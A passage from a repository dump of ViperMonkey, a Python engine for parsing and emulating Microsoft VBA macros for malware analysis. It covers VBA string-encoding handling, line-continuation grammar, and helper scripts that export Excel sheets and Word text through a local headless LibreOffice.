39 | 40 | __version__ = '0.08' 41 | 42 | import string 43 | import sys 44 | try: 45 | # sudo pypy -m pip install rure 46 | import rure as re 47 | except: 48 | import re 49 | 50 | def is_wide_str(the_str): 51 | """ 52 | Test to see if the given string is a simple wide char string (every other 53 | character is a null byte). 54 | """ 55 | if (len(the_str) < 2): 56 | return False 57 | if ((len(the_str) % 2) != 0): 58 | return False 59 | if ('\x00' not in the_str): 60 | return False 61 | if (the_str.count('\x00') != len(the_str)//2): 62 | return False 63 | is_wide = True 64 | for i in range(1, len(the_str)//2 + 1): 65 | if (the_str[i * 2 - 1] != '\x00'): 66 | is_wide = False 67 | break 68 | return is_wide 69 | 70 | def convert_wide_to_ascii(the_str): 71 | """ 72 | Convert a simple wide string to ASCII. 73 | """ 74 | if (not is_wide_str(the_str)): 75 | return the_str 76 | # Return every other character. 77 | return the_str[::2] 78 | 79 | def is_mixed_wide_ascii_str(the_str): 80 | """ 81 | Test a string to see if it is a mix of wide and ASCII chars. 82 | """ 83 | uni_str = None 84 | try: 85 | uni_str = the_str.decode("utf-8") 86 | except UnicodeDecodeError: 87 | # Punt. 88 | return False 89 | extended_asc_pat = b"[\x80-\xff]" 90 | if (re.search(extended_asc_pat, uni_str) is not None): 91 | return True 92 | return False 93 | 94 | str_to_ascii_map = None 95 | def get_ms_ascii_value(the_str): 96 | """ 97 | Get the VBA ASCII value of a given string. This handles VBA using a different 98 | extended ASCII character set than everyone else in the world. 99 | 100 | This handles both regular Python strings and VbStr objects. 101 | """ 102 | 103 | # Sanity check. 104 | if ((not isinstance(the_str, str)) and (not isinstance(the_str, VbStr))): 105 | raise ValueError("'" + str(the_str) + "' is not a string.") 106 | 107 | # Initialize the map from wide char strings to MS ascii value if needed.
108 | global str_to_ascii_map 109 | if (str_to_ascii_map is None): 110 | str_to_ascii_map = {} 111 | for code in VbStr.ascii_map.keys(): 112 | for bts in VbStr.ascii_map[code]: 113 | chars = "" 114 | for bt in bts: 115 | chars += chr(bt) 116 | str_to_ascii_map[chars] = code 117 | 118 | # Convert the string to a Python string if we were given a VB string. 119 | if (isinstance(the_str, VbStr)): 120 | the_str = the_str.to_python_str() 121 | 122 | # Sanity check. 123 | if (len(the_str) == 0): 124 | #raise ValueError("String length is 0.") 125 | return 0 126 | 127 | # Look up the MS extended ASCII code. 128 | if (the_str not in str_to_ascii_map): 129 | 130 | # Punt and just return the code for the 1st char in the string. 131 | return ord(the_str[0]) 132 | 133 | # MS wide char. Return MS extended ASCII code. 134 | return str_to_ascii_map[the_str] 135 | 136 | class VbStr(object): 137 | 138 | # VBA uses a different extended ASCII character set for byte values greater than 127 139 | # (https://bettersolutions.com/vba/strings-characters/ascii-characters.htm). These 140 | # are seen by ViperMonkey as multi-byte characters. To handle this we have a map that 141 | # maps from the "special" VBA ASCII code for a character to the UTF-8 byte sequence(s) 142 | # that encode the same character in standard Unicode. 143 | ascii_map = { 144 | 128: [[226, 130, 172]], 145 | #129: [[239, 191, 189], [208, 131]], 146 | 129: [[208, 131]], 147 | 130: [[226, 128, 154]], 148 | 131: [[198, 146], [209, 147]], 149 | 132: [[226, 128, 158]], 150 | 133: [[226, 128, 166]], 151 | 134: [[226, 128, 160]], 152 | 135: [[226, 128, 161]], 153 | 136: [[203, 134]], 154 | 137: [[226, 128, 176]], 155 | 138: [[197, 160]], 156 | 139: [[226, 128, 185]], 157 | 140: [[197, 146]], 158 | # TODO: Figure out actual bytes for the commented out characters.
159 | #141: [[239, 191, 189]], 160 | 142: [[197, 189]], 161 | #143: [[239, 191, 189]], 162 | #144: [[239, 191, 189]], 163 | 145: [[226, 128, 152]], 164 | 146: [[226, 128, 153]], 165 | 147: [[226, 128, 156]], 166 | 148: [[226, 128, 157]], 167 | 149: [[226, 128, 162]], 168 | 150: [[226, 128, 147]], 169 | 151: [[226, 128, 148]], 170 | 152: [[203, 156]], 171 | 153: [[226, 132, 162]], 172 | 154: [[197, 161]], 173 | 155: [[226, 128, 186]], 174 | 156: [[197, 147]], 175 | 157: [[239, 191, 189]], 176 | 158: [[197, 190]], 177 | 159: [[197, 184]], 178 | 160: [[194, 160]], 179 | 161: [[194, 161]], 180 | 162: [[194, 162]], 181 | 163: [[194, 163]], 182 | 164: [[194, 164]], 183 | 165: [[194, 165]], 184 | 166: [[194, 166]], 185 | 167: [[194, 167]], 186 | 168: [[194, 168]], 187 | 169: [[194, 169]], 188 | 170: [[194, 170]], 189 | 171: [[194, 171]], 190 | 172: [[194, 172]], 191 | 173: [[194, 173]], 192 | 174: [[194, 174]], 193 | 175: [[194, 175]], 194 | 176: [[194, 176]], 195 | 177: [[194, 177]], 196 | 178: [[194, 178]], 197 | 179: [[194, 179]], 198 | 180: [[194, 180]], 199 | 181: [[194, 181]], 200 | 182: [[194, 182]], 201 | 183: [[194, 183]], 202 | 184: [[194, 184]], 203 | 185: [[194, 185]], 204 | 186: [[194, 186]], 205 | 187: [[194, 187]], 206 | 188: [[194, 188]], 207 | 189: [[194, 189]], 208 | 190: [[194, 190]], 209 | 191: [[194, 191]], 210 | 192: [[195, 128]], 211 | 193: [[195, 129]], 212 | 194: [[195, 130]], 213 | 195: [[195, 131]], 214 | 196: [[195, 132]], 215 | 197: [[195, 133]], 216 | 198: [[195, 134]], 217 | 199: [[195, 135]], 218 | 200: [[195, 136]], 219 | 201: [[195, 137]], 220 | 202: [[195, 138]], 221 | 203: [[195, 139]], 222 | 204: [[195, 140]], 223 | 205: [[195, 141]], 224 | 206: [[195, 142]], 225 | 207: [[195, 143]], 226 | 208: [[195, 144]], 227 | 209: [[195, 145]], 228 | 210: [[195, 146]], 229 | 211: [[195, 147]], 230 | 212: [[195, 148]], 231 | 213: [[195, 149]], 232 | 214: [[195, 150]], 233 | 215: [[195, 151]], 234 | 216: [[195, 152]], 235 | 217: [[195, 153]], 236 | 
218: [[195, 154]], 237 | 219: [[195, 155]], 238 | 220: [[195, 156]], 239 | 221: [[195, 157]], 240 | 222: [[195, 158]], 241 | 223: [[195, 159]], 242 | 224: [[195, 160]], 243 | 225: [[195, 161]], 244 | 226: [[195, 162]], 245 | 227: [[195, 163]], 246 | 228: [[195, 164]], 247 | 229: [[195, 165]], 248 | 230: [[195, 166]], 249 | 231: [[195, 167]], 250 | 232: [[195, 168]], 251 | 233: [[195, 169]], 252 | 234: [[195, 170]], 253 | 235: [[195, 171]], 254 | 236: [[195, 172]], 255 | 237: [[195, 173]], 256 | 238: [[195, 174]], 257 | 239: [[195, 175]], 258 | 240: [[195, 176]], 259 | 241: [[195, 177]], 260 | 242: [[195, 178]], 261 | 243: [[195, 179]], 262 | 244: [[195, 180]], 263 | 245: [[195, 181]], 264 | 246: [[195, 182]], 265 | 247: [[195, 183]], 266 | 248: [[195, 184]], 267 | 249: [[195, 185]], 268 | 250: [[195, 186]], 269 | 251: [[195, 187]], 270 | 252: [[195, 188]], 271 | 253: [[195, 189]], 272 | 254: [[195, 190]], 273 | 255: [[195, 191]], 274 | } 275 | 276 | def __init__(self, orig_str, is_vbscript=False): 277 | """ 278 | Create a new VBA string object. 279 | 280 | orig_str - The raw Python string, or a list of VB "characters" (used internally to copy a chunk). 281 | is_vbscript - VBScript handles mixed ASCII/wide char strings differently than 282 | VBA. Set this to True if VBScript is being analyzed, False if VBA is being 283 | analyzed. 284 | 285 | NOTE: This just handles characters from Microsoft's special extended ASCII set. 286 | 287 | """ 288 | 289 | # Track if this is a VBScript string. 290 | self.is_vbscript = is_vbscript 291 | 292 | # Copy constructor (sort of): build from an existing list of VB characters. 293 | if (isinstance(orig_str, list)): 294 | self.vb_str = orig_str 295 | self.orig_str = "".join(self.vb_str) 296 | return 297 | 298 | # Make sure we have a string.
299 | try: 300 | orig_str = str(orig_str) 301 | except: 302 | if (isinstance(orig_str, unicode)): 303 | orig_str = ''.join(filter(lambda x:x in string.printable, orig_str)) 304 | else: 305 | raise ValueError("Given value cannot be converted to a string.") 306 | self.orig_str = orig_str 307 | 308 | # If this is VBScript each character will be a single byte (like the Python 309 | # string). 310 | self.vb_str = [] 311 | if (is_vbscript): 312 | self.vb_str = list(orig_str) 313 | 314 | # This is a VBA string. 315 | else: 316 | 317 | # Break out ASCII characters and multi-byte wide chars as individual "characters". 318 | 319 | # Replace the multi-byte wide chars with special strings. We will break these out 320 | # later. 321 | tmp_str = orig_str 322 | for code in self.ascii_map.keys(): 323 | for pos, bts in enumerate(self.ascii_map[code]): 324 | # Build the byte string for this particular encoding of the character. 325 | chars = "" 326 | for bval in bts: 327 | chars += chr(bval) 328 | code_str = None 329 | try: 330 | code_str = str(code) 331 | except UnicodeEncodeError: 332 | code_str = filter(isprint, code) 333 | try: 334 | tmp_str = str(tmp_str) 335 | except UnicodeEncodeError: 336 | tmp_str = filter(isprint, tmp_str) 337 | #print tmp_str 338 | #print type(tmp_str) 339 | #print code 340 | #print type(code) 341 | #print pos 342 | #print type(pos) 343 | #print code_str 344 | #print type(code_str) 345 | tmp_str = tmp_str.replace(chars, "MARK!@#$%%$#@!:.:.:.:.:.:." + code_str + "_" + str(pos) + "MARK!@#$%%$#@!") 346 | 347 | # Split the string up into ASCII char chunks and individual wide chars. 348 | for val in tmp_str.split("MARK!@#$%"): 349 | 350 | # Remove additional markings. 351 | val = val.replace("%$#@!", "") 352 | 353 | # Sanity check. 354 | if (len(val) == 0): 355 | continue 356 | 357 | # Is this a special MS extended ASCII char? 358 | if (val.startswith(":.:.:.:.:.:.")): 359 | 360 | # Yes, break this out as a single "wide char".
361 | val = val.replace(":.:.:.:.:.:.", "") 362 | pos = int(val.split("_")[1]) 363 | val = int(val.split("_")[0]) 364 | chars = "" 365 | for bt in self.ascii_map[val][pos]: 366 | chars += chr(bt) 367 | self.vb_str.append(chars) 368 | 369 | # ASCII char chunk. 370 | else: 371 | for c in val: 372 | self.vb_str.append(c) 373 | 374 | def __repr__(self): 375 | r = "" 376 | for vb_c in self.vb_str: 377 | if (len(r) > 0): 378 | r += ":" 379 | if (len(vb_c) == 1): 380 | if (ord(vb_c) == 127): 381 | r += str(hex(ord(vb_c))) 382 | else: 383 | r += vb_c 384 | else: 385 | first = True 386 | for c in vb_c: 387 | if (not first): 388 | r += " " 389 | first = False 390 | r += hex(ord(c)) 391 | 392 | return r 393 | 394 | def len(self): 395 | return len(self.vb_str) 396 | 397 | def to_python_str(self): 398 | """ 399 | Return the VB string as a raw Python str. 400 | """ 401 | return "".join(self.vb_str) 402 | 403 | def get_chunk(self, start, end): 404 | """ 405 | Return a chunk of the string as a VbStr object. 406 | """ 407 | 408 | # Sanity check. 409 | if ((start < 0) or (start > len(self.vb_str))): 410 | raise ValueError("start index " + str(start) + " out of bounds.") 411 | if ((end < 0) or (end > len(self.vb_str))): 412 | raise ValueError("end index " + str(end) + " out of bounds.") 413 | if (start > end): 414 | raise ValueError("start index (" + str(start) + ") > end index (" + str(end) + ").") 415 | 416 | # Return the chunk, keeping the VBScript/VBA flag of this string. 417 | return VbStr(self.vb_str[start:end], self.is_vbscript) 418 | 419 | def update_chunk(self, start, end, new_str): 420 | """ 421 | Return a new copy of the current string updated with the given chunk 422 | replaced with the given string (can be a VbStr or a raw Python string). 423 | 424 | The current VB string object is not changed. 425 | """ 426 | 427 | # Sanity check.
428 | if ((start < 0) or (start >= len(self.vb_str))): 429 | raise ValueError("start index " + str(start) + " out of bounds.") 430 | if ((end < 0) or (end > len(self.vb_str))): 431 | raise ValueError("end index " + str(end) + " out of bounds.") 432 | if (start > end): 433 | raise ValueError("start index (" + str(start) + ") > end index (" + str(end) + ").") 434 | 435 | # Pull out the unchanged prefix and suffix. 436 | prefix = self.get_chunk(0, start).to_python_str() 437 | suffix = self.get_chunk(end, self.len()).to_python_str() 438 | 439 | # Put string together as a Python string. 440 | if (isinstance(new_str, VbStr)): 441 | new_str = new_str.to_python_str() 442 | updated_str = VbStr(prefix + new_str + suffix, self.is_vbscript) 443 | 444 | # Done. Return as a VbStr. 445 | return updated_str 446 | 447 | -------------------------------------------------------------------------------- /vipermonkey/core/vba_lines.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | ViperMonkey: VBA Grammar - Lines 4 | 5 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 6 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 7 | 8 | Author: Philippe Lagadec - http://www.decalage.info 9 | License: BSD, see source code or documentation 10 | 11 | Project Repository: 12 | https://github.com/decalage2/ViperMonkey 13 | """ 14 | 15 | # === LICENSE ================================================================== 16 | 17 | # ViperMonkey is copyright (c) 2015-2016 Philippe Lagadec (http://www.decalage.info) 18 | # All rights reserved. 19 | # 20 | # Redistribution and use in source and binary forms, with or without modification, 21 | # are permitted provided that the following conditions are met: 22 | # 23 | # * Redistributions of source code must retain the above copyright notice, this 24 | # list of conditions and the following disclaimer.
25 | # * Redistributions in binary form must reproduce the above copyright notice, 26 | # this list of conditions and the following disclaimer in the documentation 27 | # and/or other materials provided with the distribution. 28 | # 29 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 30 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 31 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 32 | # DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 33 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 34 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 35 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 36 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 37 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 38 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 39 | 40 | 41 | # ------------------------------------------------------------------------------ 42 | # CHANGELOG: 43 | # 2015-02-12 v0.01 PL: - first prototype 44 | # 2015-2016 PL: - many updates 45 | # 2016-06-11 v0.02 PL: - split vipermonkey into several modules 46 | 47 | __version__ = '0.02' 48 | 49 | # ------------------------------------------------------------------------------ 50 | # TODO: 51 | 52 | # --- IMPORTS ------------------------------------------------------------------ 53 | 54 | from logger import log 55 | 56 | from pyparsing import * 57 | 58 | # --- WSC = White Space Character -------------------------------------------- 59 | 60 | # Important: need to change the default pyparsing whitespace setting, because CRLF is not a whitespace for VBA. 
61 | # see MS-VBAL 3.2.2 page 25: 62 | # WSC = (tab-character / eom-character /space-character / DBCS-whitespace / most-Unicode-class-Zs) 63 | # tab-character = %x0009 64 | # eom-character = %x0019 65 | # space-character = %x0020 66 | # DBCS-whitespace = %x3000 67 | # most-Unicode-class-Zs = 68 | # => see http://www.fileformat.info/info/unicode/category/Zs/list.htm 69 | 70 | # TODO: add unicode WS characters, if unicode is properly supported 71 | 72 | ParserElement.setDefaultWhitespaceChars(' \t\x19') 73 | 74 | # IMPORTANT NOTE: it seems preferable NOT to use pyparsing's LineEnd()/lineEnd, 75 | # but line_terminator instead (defined below) 76 | 77 | # --- VBA Physical/Logical Lines --------------------------------------------- 78 | 79 | # 3.2.1 Physical Line Grammar 80 | # module-body-physical-structure = *source-line [non-terminated-line] 81 | # source-line = *non-line-termination-character line-terminator 82 | # non-terminated-line = *non-line-termination-character 83 | # line-terminator = (%x000D %x000A) / %x000D / %x000A / %x2028 / %x2029 84 | # non-line-termination-character = 85 | non_line_termination_character = CharsNotIn('\x0D\x0A', exact=1) # exactly one non_line_termination_character 86 | line_terminator = Literal('\x0D\x0A') | Literal('\x0D') | Literal('\x0A') 87 | non_terminated_line = Optional(CharsNotIn('\x0D\x0A')) # any number of non_line_termination_character 88 | source_line = Optional(CharsNotIn('\x0D\x0A')) + line_terminator 89 | module_body_physical_structure = ZeroOrMore(source_line) + Optional(non_terminated_line) 90 | 91 | # 3.2.2 Logical Line Grammar 92 | # module-body-logical-structure = *extended-line 93 | # extended-line = *(line-continuation / non-line-termination-character) line-terminator 94 | # line-continuation = *WSC underscore *WSC line-terminator 95 | # module-body-lines = *logical-line 96 | # logical-line = LINE-START *extended-line LINE-END 97 | 98 | # NOTE: according to tests with MS Office 2007, and contrary to MS-VBAL, the 
line continuation pattern requires at 99 | # least one whitespace before the underscore, but not after. 100 | # line_continuation = (White(min=1) + '_' + White(min=0) + line_terminator).leaveWhitespace() 101 | whitespaces = Word(' \t\x19').leaveWhitespace() 102 | line_continuation = (whitespaces + '_' + Optional(whitespaces) + line_terminator).leaveWhitespace() 103 | # replace line_continuation by a single space: 104 | line_continuation.setParseAction(replaceWith(' ')) 105 | extended_line = Combine(ZeroOrMore(line_continuation | non_line_termination_character) + line_terminator) 106 | module_body_logical_structure = ZeroOrMore(extended_line) 107 | logical_line = LineStart() + ZeroOrMore(extended_line.leaveWhitespace()) + line_terminator # rather than LineEnd() 108 | module_body_lines = Combine(ZeroOrMore(logical_line)) # .setDebug() 109 | 110 | # === FUNCTIONS ============================================================== 111 | 112 | def vba_collapse_long_lines(vba_code): 113 | """ 114 | Parse VBA module code to detect line continuation characters (underscores) and 115 | collapse split lines. Each line continuation (a space, an underscore and a line terminator) is replaced by a single space. 116 | 117 | :param vba_code: str, VBA module code 118 | :return: str, VBA module code with long lines collapsed 119 | """ 120 | # make sure the last line ends with a newline char, otherwise the parser breaks: 121 | if not vba_code: 122 | return "" 123 | if not vba_code.endswith('\n'): 124 | vba_code += '\n' 125 | # return module_body_lines.parseString(vba_code, parseAll=True)[0] 126 | # quicker solution without pyparsing: 127 | # TODO: use a regex instead, to allow whitespaces after the underscore?
128 | vba_code = vba_code.replace(' _\r\n', ' ') 129 | vba_code = vba_code.replace(' _\r', ' ') 130 | vba_code = vba_code.replace(' _\n', ' ') 131 | return vba_code 132 | -------------------------------------------------------------------------------- /vipermonkey/core/visitor.py: -------------------------------------------------------------------------------- 1 | """ 2 | ViperMonkey: Class template for visitor classes for the visitor design pattern. 3 | 4 | ViperMonkey is a specialized engine to parse, analyze and interpret Microsoft 5 | VBA macros (Visual Basic for Applications), mainly for malware analysis. 6 | 7 | Author: Philippe Lagadec - http://www.decalage.info 8 | License: BSD, see source code or documentation 9 | 10 | Project Repository: 11 | https://github.com/decalage2/ViperMonkey 12 | """ 13 | 14 | # === LICENSE ================================================================== 15 | 16 | # ViperMonkey is copyright (c) 2015-2019 Philippe Lagadec (http://www.decalage.info) 17 | # All rights reserved. 18 | # 19 | # Redistribution and use in source and binary forms, with or without modification, 20 | # are permitted provided that the following conditions are met: 21 | # 22 | # * Redistributions of source code must retain the above copyright notice, this 23 | # list of conditions and the following disclaimer. 24 | # * Redistributions in binary form must reproduce the above copyright notice, 25 | # this list of conditions and the following disclaimer in the documentation 26 | # and/or other materials provided with the distribution. 27 | # 28 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 29 | # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 30 | # WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 31 | # DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 32 | # FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 33 | # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 34 | # SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 35 | # CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 36 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 37 | # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 38 | 39 | class visitor(object): 40 | """ 41 | The class template for visitor objects for the visitor design pattern. 42 | Visitors can be accepted by the accept method of VBA_Object objects. 43 | """ 44 | 45 | def visit(self): 46 | raise NotImplementedError("Not implemented.") 47 | -------------------------------------------------------------------------------- /vipermonkey/export_all_excel_sheets.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | """@package export_all_excel_sheets 4 | Export all of the sheets of an Excel file as separate CSV files. This 5 | is Python 3. 6 | """ 7 | 8 | import sys 9 | import os 10 | import signal 11 | # sudo pip3 install psutil 12 | import psutil 13 | import subprocess 14 | import time 15 | import codecs 16 | import string 17 | 18 | # sudo pip3 install unotools 19 | # sudo apt install libreoffice-calc python3-uno 20 | from unotools import Socket, connect 21 | from unotools.component.calc import Calc 22 | from unotools.unohelper import convert_path_to_url 23 | from unotools import ConnectionError 24 | 25 | # Force UTF-8 output on stdout so that printing non-ASCII text works. 26 | sys.stdout = codecs.getwriter("utf-8")(sys.stdout.detach()) 27 | 28 | # Connection information for LibreOffice. 29 | HOST = "127.0.0.1" 30 | PORT = 2002 31 | 32 | def strip_unprintable(the_str): 33 | """Strip out unprintable chars from a string.
34 | 35 | @param the_str (str) The string to strip. 36 | 37 | @return (str) The given string with unprintable chars stripped 38 | out. 39 | 40 | """ 41 | 42 | # Text (str) input: keep only the printable characters. 43 | r = the_str 44 | if ((isinstance(r, str)) or (not isinstance(r, bytes))): 45 | r = ''.join(filter(lambda x:x in string.printable, r)) 46 | 47 | # bytes input: iterating yields integer char codes, so check chr() of each one. 48 | else: 49 | tmp_r = "" 50 | for char_code in filter(lambda x:chr(x) in string.printable, r): 51 | tmp_r += chr(char_code) 52 | r = tmp_r 53 | 54 | # Done. 55 | return r 56 | 57 | def to_str(s): 58 | """ 59 | Convert a bytes-like object to a str. 60 | 61 | @param s (bytes) The string to convert to str. If this is already a str, 62 | the original string is returned. 63 | 64 | @return (str) s as a str. 65 | """ 66 | 67 | # Needs conversion? 68 | if (isinstance(s, bytes)): 69 | try: 70 | return s.decode() 71 | except UnicodeDecodeError: 72 | return strip_unprintable(s) 73 | return s 74 | 75 | def is_excel_file(maldoc): 76 | """Check to see if the given file is an Excel file. 77 | 78 | @param maldoc (str) The name of the file to check. 79 | 80 | @return (bool) True if the file is an Excel file, False if not. 81 | 82 | """ 83 | typ = subprocess.check_output(["file", maldoc]) 84 | if ((b"Excel" in typ) or (b"Microsoft OOXML" in typ)): 85 | return True 86 | typ = subprocess.check_output(["exiftool", maldoc]) 87 | return (b"vnd.ms-excel" in typ) 88 | 89 | ################################################################################################### 90 | def wait_for_uno_api(): 91 | """Sleeps until the LibreOffice UNO API is made available by the headless 92 | LibreOffice process. Takes a bit to spin up even after the OS 93 | reports the process as running. Tries 3 times before giving up and 94 | throwing an Exception.
95 | 96 | """ 97 | 98 | tries = 0 99 | 100 | while tries < 3: 101 | try: 102 | connect(Socket(HOST, PORT)) 103 | return 104 | except ConnectionError: 105 | time.sleep(5) 106 | tries += 1 107 | 108 | raise Exception("libreoffice UNO API failed to start") 109 | 110 | ################################################################################################### 111 | def get_office_proc(): 112 | """Returns the process info for the headless LibreOffice 113 | process, or None if it is not running. 114 | 115 | @return (dict) Process info (keys 'pid', 'name' and 'username') for the LibreOffice process if found, None if not found. 116 | 117 | """ 118 | 119 | for proc in psutil.process_iter(): 120 | try: 121 | pinfo = proc.as_dict(attrs=['pid', 'name', 'username']) 122 | except psutil.NoSuchProcess: 123 | pass 124 | else: 125 | if (pinfo["name"].startswith("soffice")): 126 | return pinfo 127 | return None 128 | 129 | ################################################################################################### 130 | def is_office_running(): 131 | """Check to see if the headless LibreOffice process is running. 132 | 133 | @return (bool) True if running, False otherwise 134 | 135 | """ 136 | 137 | return True if get_office_proc() else False 138 | 139 | ################################################################################################### 140 | def run_soffice(): 141 | """Start the headless, UNO supporting, LibreOffice process to access 142 | the API, if it is not already running. 143 | 144 | """ 145 | 146 | # start the process 147 | if not is_office_running(): 148 | 149 | # soffice is not running. Run it in listening mode.
150 | cmd = "/usr/lib/libreoffice/program/soffice.bin --headless --invisible " + \ 151 | "--nocrashreport --nodefault --nofirststartwizard --nologo " + \ 152 | "--norestore " + \ 153 | '--accept="socket,host=127.0.0.1,port=2002,tcpNoDelay=1;urp;StarOffice.ComponentContext"' 154 | subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True) 155 | wait_for_uno_api() 156 | 157 | def get_component(fname, context): 158 | """Load the object for the Excel spreadsheet. 159 | 160 | @param fname (str) The name of the Excel file. 161 | 162 | @param context (ScriptContext) The UNO object connected to the local LibreOffice server. 163 | 164 | @return (Calc) UNO LibreOffice Calc object representing the loaded 165 | Excel file. 166 | 167 | """ 168 | url = convert_path_to_url(fname) 169 | component = Calc(context, url) 170 | return component 171 | 172 | def fix_file_name(fname): 173 | """ 174 | Make a string safe for use in a file name: every character whose code is below 48 ('0') or above 122 ('z'), e.g. spaces, '.', '/', '-' and all non-ASCII characters, is replaced with its hex code (a space becomes '0x20'). 175 | """ 176 | r = "" 177 | for c in fname: 178 | if ((ord(c) < 48) or (ord(c) > 122)): 179 | r += hex(ord(c)) 180 | continue 181 | r += c 182 | 183 | return r 184 | 185 | def convert_csv(fname): 186 | """Convert all of the sheets in a given Excel spreadsheet to CSV 187 | files. Also get the name of the currently active sheet. 188 | 189 | @param fname (str) The name of the Excel file. 190 | 191 | @return (list) A list where the 1st element is the name of the 192 | currently active sheet ("NO_ACTIVE_SHEET" if no sheets are active) 193 | and the rest of the elements are the names (str) of the CSV sheet 194 | files. 195 | 196 | """ 197 | 198 | # Make sure this is an Excel file. 199 | if (not is_excel_file(fname)): 200 | 201 | # Not Excel, so no sheets. 202 | return [] 203 | 204 | # Run soffice in listening mode if it is not already running. 205 | run_soffice() 206 | 207 | # TODO: Make sure soffice is running in listening mode. 208 | # 209 | 210 | # Connect to the local LibreOffice server.
211 | context = connect(Socket(HOST, PORT)) 212 | 213 | # Load the Excel sheet. 214 | component = get_component(fname, context) 215 | 216 | # Save the currently active sheet. 217 | r = [] 218 | controller = component.getCurrentController() 219 | active_sheet = controller.ActiveSheet 220 | active_sheet_name = "NO_ACTIVE_SHEET" 221 | if (active_sheet is not None): 222 | active_sheet_name = fix_file_name(active_sheet.getName()) 223 | r.append(active_sheet_name) 224 | 225 | # Iterate on all the sheets in the spreadsheet. 226 | sheets = component.getSheets() 227 | enumeration = sheets.createEnumeration() 228 | pos = 0 229 | if sheets.getCount() > 0: 230 | while enumeration.hasMoreElements(): 231 | 232 | # Move to next sheet. 233 | sheet = enumeration.nextElement() 234 | name = sheet.getName() 235 | if (name.count(" ") > 10): 236 | name = name.replace(" ", "") 237 | name = fix_file_name(name) 238 | controller.setActiveSheet(sheet) 239 | 240 | # Set up the output URL. 241 | short_name = fname 242 | if (os.path.sep in short_name): 243 | short_name = short_name[short_name.rindex(os.path.sep) + 1:] 244 | short_name = fix_file_name(short_name) 245 | outfilename = "/tmp/sheet_%s-%s--%s.csv" % (short_name, str(pos), name.replace(' ', '_SPACE_')) 246 | pos += 1 247 | r.append(outfilename) 248 | url = convert_path_to_url(outfilename) 249 | 250 | # Export the CSV. 251 | component.store_to_url(url,'FilterName','Text - txt - csv (StarCalc)') 252 | 253 | # Close the spreadsheet. 254 | component.close(True) 255 | 256 | # clean up 257 | os.kill(get_office_proc()["pid"], signal.SIGTERM) 258 | 259 | # Done. 
260 | return r 261 | 262 | ########################################################################### 263 | ## Main Program 264 | ########################################################################### 265 | if __name__ == '__main__': 266 | r = to_str(str(convert_csv(sys.argv[1]))) 267 | print(r) 268 | -------------------------------------------------------------------------------- /vipermonkey/export_doc_text.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | """@package export_doc_text 4 | Export the document text/tables of a Word document via unotools. 5 | This is Python 3. 6 | """ 7 | 8 | # sudo apt install python3-uno 9 | # sudo pip3 install psutil 10 | import psutil 11 | import subprocess 12 | import time 13 | import argparse 14 | import json 15 | import os 16 | import signal 17 | 18 | # sudo pip3 install unotools 19 | # sudo apt install libreoffice-calc python3-uno 20 | from unotools import Socket, connect 21 | from unotools.component.writer import Writer 22 | from unotools.unohelper import convert_path_to_url 23 | from unotools import ConnectionError 24 | 25 | # Connection information for LibreOffice. 26 | HOST = "127.0.0.1" 27 | PORT = 2002 28 | 29 | ################################################################################################### 30 | def is_word_file(fname): 31 | """Check to see if the given file is a Word file. 32 | 33 | @param fname (str) The path of the file to check. 34 | 35 | @return (bool) True if the file is a Word file, False if not. 36 | 37 | """ 38 | typ = subprocess.check_output(["file", fname]) 39 | return ((b"Microsoft Office Word" in typ) or 40 | (b"Word 2007+" in typ) or 41 | (b"Microsoft OOXML" in typ)) 42 | 43 | ################################################################################################### 44 | def wait_for_uno_api(): 45 | """Sleeps until the LibreOffice UNO API is made available by the headless 46 | LibreOffice process.
